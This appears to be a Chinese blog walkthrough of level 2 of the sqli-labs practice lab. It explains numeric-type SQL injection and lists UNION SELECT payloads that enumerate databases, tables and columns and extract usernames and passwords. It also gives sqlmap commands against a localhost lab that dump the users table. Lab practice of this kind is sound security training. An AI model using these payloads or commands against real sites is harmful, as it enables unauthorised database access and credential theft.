sqli-labs（第二关）

前言：

今天做第二关。

正文：

打开第二关页面如下：

（1）找注入点：
还是一样，试一下id，我上篇文章忘记说了，第一关是字符型，一开始判断注入类型，是字符型还是数字型，字符型就是id是一个字符串，如果是字符串的话，在数据库里就有一个单引号，这个时候再注入的时候就需要对SQL进行闭合，具体体现就是在id=1后面加个单引号。数字型就是在SQL语句中id=数字，然后在进行注入的时候，就不需要单引号闭合，如果闭合的话，就会一直报错。
这个时候输入以前的payload

?id=1'
?id=1''

都会报错。这个时候我们只需要把单引号去掉就行。
（2）找列

?id=1 order by 2
?id=1 order by 3
?id=1 order by 4

说明是3列。
（3）找数据库名

?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata

（4）找表名

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()

（5）找列名

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'

（5）找数据

?id=-1 union select 1,group_concat(username),group_concat(password) from security.users

用sqlmap跑一下：

sqlmap.py -u http://localhost/sqli-labs/sqli-labs-master/Less-2/?id=1

sqlmap.py -u http://localhost/sqli-labs/sqli-labs-master/Less-2/?id=1 --dbs

sqlmap.py -u http://localhost/sqli-labs/sqli-labs-master/Less-2/?id=1 -D security --tables

sqlmap.py -u http://localhost/sqli-labs/sqli-labs-master/Less-2/?id=1 -D security -T users --column

sqlmap.py -u http://localhost/sqli-labs/sqli-labs-master/Less-2/?id=1 -D security -T users -C id,password,username --dump